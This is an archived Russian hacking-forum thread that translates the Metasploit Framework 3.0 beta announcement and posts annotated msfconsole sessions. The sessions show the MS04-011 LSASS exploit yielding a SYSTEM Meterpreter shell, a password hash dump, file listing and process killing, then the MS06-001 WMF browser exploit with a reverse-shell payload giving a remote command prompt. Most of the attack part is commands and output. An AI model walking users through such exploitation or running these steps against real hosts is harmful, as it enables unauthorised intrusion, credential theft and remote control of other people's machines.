PDA

Просмотр полной версии : Метасплоит Framework v. 3.0 (описание)


-=lebed=-
28.11.2006, 14:08
Меtasploit Framework 3.0

Предисловие:
Прежде чем приступать к чтению статьи, для более глубокого понимания рекомендую ознакомиться с моими статьями по данному пакету
http://www.forum.antichat.ru/thread21599.html
http://www.forum.antichat.ru/thread21686.html
Статья ИМХО не расчитана на новичков, а предназначена для тех кто достаточно хорошо владеет навыками пользования пакетом и обладает определённым багажом знаний по вопросом эксплуатации уязвимостей...

1. Перевод с официального сайта новости, касающейся выхода пакета Metasploit Framework 3.0 Beta 1 (hdm) от 02.08.2006. оригинал новости (http://metasploit.com/)

Мы счастливы объявить, что первый beta 3.0 релиз теперь готов к загрузке. Этот выпуск содержит многочисленные исправления (багфиксы) и усовершенствования к предыдущему выпуску альфа релиз. 3.0 1 Beta полностью совместим с Линуксом, BSD, Mac OS X, и Windows (используется наш доработанный Cygwin инсталлятор). Если Вы хотели бы обсудить выпуск beta с другими пользователями, пожалуйста подпишитесь на список рассылки beta framework, послав пустое письмо по e-mail с темой framework-beta.

Некоторые фишки по сравнению с версией 2.6:
- Все модули организованы в каталоге heirarchy
- Общие{Обычные} Meterpreter модули были объединены в 'stdapi'
- Новые особенности Meterpreter значительно помогают с испытанием проникновения
- Новый тип "пассивных" эксплоитов (браузер, сниффер, нападения на ids - ситему обнаружения вторжений )
- Модули отказа в обслуживании (ms05-035 и пропаченный RRAS)
- Поддержка для множественных шеллов (оболочек) при эксплуатировании с пассивными модулями
- Поддержка для последних багов браузеров :-)

Этот выпуск может быть скачан с официального web-сайта Metasploit отсюда (http://metasploit.com/projects/Framework/msf3/#download)

Пользователи Unix, нуждаются в установке openssl и zlib модулей Руби (Ruby) (http://ru.wikipedia.org/wiki/Ruby) (интерпретируемый язык программирования высокого уровня) для загрузки среды разработки
Если Вы используете Ubuntu, выполните следующие команды:
# apt-get install libzlib-ruby
# apt-get install libopenssl-ruby

Пользователь других дистрибутивов или разновидностей Unix могут загрузить последнюю версию Руби от www.ruby-lang.org и собрать его из исходника.

Mac OS X пользователи должены установить GNU Readline до пересборки Руби. Хотя можно использовать Среду разработки без readline, но на завершение работы в msfconsole может потребоваться некоторое время. (прим. не уверен что правильно перевёл)

Пользователи Windows будут должны выйти из любых приложений на базе Cygwin перед запуском инсталятора и не использовать Среду разработки в это время. Мы действительно пробовали работать с родным Руби-интерпретатором для Windows, но последовали многочисленные проблемы вода-вывода/readline/stdin, и мы попытаемся снова, основной код сделать более стабильным (устойчивым).

Быстрая демонстрация использования msfconsole с meterpreter:

____________
<metasploit>
------------
\, __,
\ (oo) ____
(__)) || - || *


= [msf v3.0-beta-1
=[ msf v3.0-beta-1
+ -- --=[ 86 exploits - 90 payloads....................[86 эксплоитов - 90 начинок (полезных грузов)
+ -- --=[ 16 encoders - 4 nops ........................[16 кодеров - 4 только для указанных целей (неуверен в переводе)
= [4 aux

msf > use exploit/windows/smb/ms04_011_lsass ............................ будем использовать ms04_011_lsass эксплоит
msf exploit(ms04_011_lsass) > set RHOST 192.168.0.106 ................... устанавливаем IP-адрес удалённого хоста
RHOST => 192.168.0.106
msf exploit(ms04_011_lsass) > set PAYLOAD windows/meterpreter/bind_tcp .. устанавливаем начинку bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms04_011_lsass) > exploit.................................... запускаем эксплоит

Started bind handler.. .................................... стартует связанный обработчик

Getting OS information... .................................... Получаем информацию об операционной системе

Trying to exploit Windows 2000 LAN Manager .......................... Пробуем эксплуатировать уязвимость диспечера локальной сети Windows 2000

Transmitting intermediate stager for over-sized stage...(89 bytes) .. Передача промежуточного звена stager для стадии с завышенными размерами... (89 байтов)

Sending stage (2834 bytes) .......................................... Посылка стадии (2834 байта)

Sleeping before handling stage... ................................... Бездействие перед обработкой стадии

Uploading DLL (73739 bytes)... ...................................... Загрузка DLL (73739 байтов)...

Upload completed. .................................................. . Загрузка завершена.

Meterpreter session 1 opened (192.168.0.145:41829 ->
192.168.0.106:4444) .................................................. ... открыт Meterpreter сеанс 1 (192.168.0.145:41829->192.168.0.106:4444)

The DCERPC service did not reply to our request ..................... сервис(служба) DCERPC не отвечал на наш запрос
Loading extension stdapi...success. ..................................... Загрузка расширения stdapi (стандартн. api) ... успех.
meterpreter > getuid .................................................. .. получить uid (универс. идентификатор)
Server username: SYSTEM ................................................. Имя пользователя сервера SYSTEM!
meterpreter > use priv .................................................. используем priv
Loading extension priv...success. ....................................... Загрузка расширения priv ... успех.
meterpreter > hashdump .................................................. Дампим хэш
Administrator:500:aad3b435b51404eeaad3b435b51404ee :[snip]::: ............ Administrator:500:aad3b435b51404eeaad3b435b51404ee : [надрез]::
meterpreter > cd c:meterpreter > ls ..................................... переходим в корень диска с:, листинг содержимого диска c:
Listing: c: .................................................. ........... Листинг С:
============

Mode Size Type Last modified Name ....................................... Размер/Режим/Тип/Дата послед. модификации/Имя
---- ---- ---- ------------- ----
100444/r--r--r-- 0 fil Sat Oct 09 11:03:03 CDT 2004 IO.SYS
100444/r--r--r-- 0 fil Sat Oct 09 11:03:03 CDT 2004 MSDOS.SYS
40777/rwxrwxrwx 0 dir Sat Oct 09 11:21:49 CDT 2004 RECYCLER
40777/rwxrwxrwx 0 dir Sat May 21 18:12:30 CDT 2005 WINNT
100666/rw-rw-rw- 195 fil Sat Oct 09 05:38:57 CDT 2004 boot.ini
100444/r--r--r-- 214416 fil Mon Dec 06 14:00:00 CST 1999 ntldr
[ snip ]

meterpreter > ps .................................................. ....... смотрим процессы

Process list
============

PID Name Path
--- ---- ----
176 smss.exe \SystemRoot\System32\smss.exe
200 csrss.exe \??\C:\WINNT\system32\csrss.exe
224 winlogon.exe \??\C:\WINNT\system32\winlogon.exe
252 services.exe C:\WINNT\system32\services.exe
264 lsass.exe C:\WINNT\system32\lsass.exe
440 svchost.exe C:\WINNT\system32\svchost.exe
[ snip ] .................................................. ................ надрез
1804 wins.exe C:\WINNT\System32\wins.exe
2676 logon.scr C:\WINNT\system32\logon.scr

meterpreter > kill 2676 .................................................. . убиваем процесс с PID 2676
Killing: 2676 .................................................. ........... убивается ;-)

Обратная связь (http://metasploit.blogspot.com/2006/08/metasploit-framework-30-beta-1.html#comments)

Старые статьи были перемещены в архив.


(с) metasploit.com, альфа версия перевода -=lebed=- 28.11.2006

P.S. Перевод сыроват, буду править... буду рад видеть здесь поправики, подсказки от всех интересующихся и пользующихся пакетом v.3.0 проекта Metasploit Framework

-=lebed=-
29.11.2006, 16:03
Meterpreter - расширенная многофункциональная начинка (полезный груз), которая может быть динамически расширена во время выполнения. В нормальных условиях, это означает, что это обеспечивает Вас основной оболочкой и позволяет Вам добавлять новые особенности к ней по мере необходимости. Пожалуйста обратитесь к Meterpreter документации для глубокого описания того, как это работает и что Вы можете сделать с этим. Meterpreter руководство может быть найдено в подкаталоге docs Framework.

О! Это уже интересней....

-=lebed=-
29.11.2006, 18:47
msf > use windows/browser/ms06_001_wmf_setabortproc
msf exploit(ms06_001_wmf_setabortproc) > set LHOST 10.0.0.1
LHOST => 10.0.0.1
msf exploit(ms06_001_wmf_setabortproc) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms06_001_wmf_setabortproc) > exploit

Started reverse handler

Using URL: http://10.0.0.1:8080/4yWFKnHdHGVHb88Ugyi69ZpK61wE6v4U7c2uHEoIJhWmZux2MC oiTAVa5

Server started.

Exploit running as background job................ Эксплоит запущен как работа на заднем плане!
msf exploit(ms06_001_wmf_setabortproc) > jobs
Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.2:1495)
msf exploit(ms06_001_wmf_setabortproc) > jobs

Jobs
====

Id Name
-- ----
0 Exploit: windows/browser/ms06_001_wmf_setabortproc
Ну и как теперь его переключить на передний план, где пайп с cmd? Мда... будем разбираться дальше, ИМХО изменения в версии 3 пакета огромны! (в сравнении с 2.7).

Gh0s7
29.11.2006, 19:22
Ну и как теперь его переключить на передний план, где пайп с cmd? Мда... будем разбираться дальше, ИМХО изменения в версии 3 пакета огромны! (в сравнении с 2.7).


Самое интересное что офф доки по 3 части нету...Даже хелпа по jobs нет...

1ten0.0net1
30.11.2006, 01:05
...нуждаются в установке openssl и zlib модулей Рубина (интерпретируемый язык программирования высокого уровня... Это Ruby что ли? =)) Плакалъ.

-=lebed=-
30.11.2006, 10:51
Это Ruby что ли? =)) Плакалъ.
Ну да, а что? Perl от слова pearl - жемчужина, а Ruby от слова Рубин, не я же названия языкам придумывал... Просто я первый раз такой услышал, а промт перевёл как Рубин. Как он по русски-то произносится? Так же как и пишется Ruby - Руби!? Как на сленге то? Я х. е. з, А? ИМХО всё таки Руби с ударением на "У" ну ладно поправить недолго...
Исправил...

-=lebed=-
30.11.2006, 21:31
msf exploit(ms06_001_wmf_setabortproc) > cmd
Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001.

C:\Program Files\Metasploit\Framework3\home>chcp
chcp
’ҐЄгй*п Є®¤®ў*п бва**Ёж*: 1251

C:\Program Files\Metasploit\Framework3\home>chcp 1251
chcp 1251
’ҐЄгй*п Є®¤®ў*п бва**Ёж*: 1251

C:\Program Files\Metasploit\Framework3\home>dir
dir
Том в устройстве C имеет метку ACER
Серийный номер тома: ХХХХ-ХХХХ

Содержимое папки C:\Program Files\Metasploit\Framework3\home

29.11.2006 23:06 <DIR> .
29.11.2006 23:06 <DIR> ..
17.02.2004 12:21 533 .bash_profile
28.08.2006 03:17 688 .bashrc
29.10.2006 22:53 499 .inputrc
30.07.2006 06:36 82 .irbrc
28.08.2006 02:38 12*501 LICENSE
28.10.2006 22:19 743 accept_license.rb
30.10.2006 07:20 23*009*280 framework.tar
29.10.2006 02:28 225 msfupdate
29.10.2006 02:20 551 run_msfconsole
29.10.2006 08:28 294 run_msfupdate
29.10.2006 22:48 362 run_msfweb
29.11.2006 23:06 <DIR> .subversion
29.11.2006 23:13 16 .LICENSED
30.10.2006 07:20 <DIR> framework
29.11.2006 23:14 <DIR> .msf3
12 файлов 23*025*774 байт
5 папок 11*026*890*752 байт свободно

C:\Program Files\Metasploit\Framework3\home>

Оказывается все просто, надо набрать cmd в консоли msf после успешного установления соединения и мы уже в шелле! Рулёз! Всё пашет, у меня даже на ноуте с предустановленной лицензионной виндой XP-HOME (система оказалась уязвима к WMF-багу) ломал сам себя, будем дальше ковырять бету 3 (ver. 3.0)
Кстати можно выйти из удалённого шелла, потом опять туда зайти, класс!

A110ut
30.11.2006, 22:12
Perl от слова pearl - жемчужина
Perl от слова Pathologically Eclectic Rubbish Lister (с) :)

-=lebed=-
30.11.2006, 22:40
Perl от слова Pathologically Eclectic Rubbish Lister (с) :)
Ну да, практический язык извлечений и отчётов.
Да хрен с ними с легендами и определениями, не в них суть-то. А суть в том что третья бета 3-ей версия пакета очень даже ничего...

P.S. Руби (Ruby) тоже аббревиатура?, может тоже тогда расшифруешь, чтоб уж для полной ясности?

win32_reverse
24.01.2007, 05:42
метасплоит рулит)) волшебноё падочко в локальной сети)))

ZERO-Y
24.02.2007, 02:05
У Metasploit'a есть будущее ! =) в инете не так и много инфы о нем..
С меня + ессенно .. продолжай в том же духе и может станешь Metasplot Master'om =)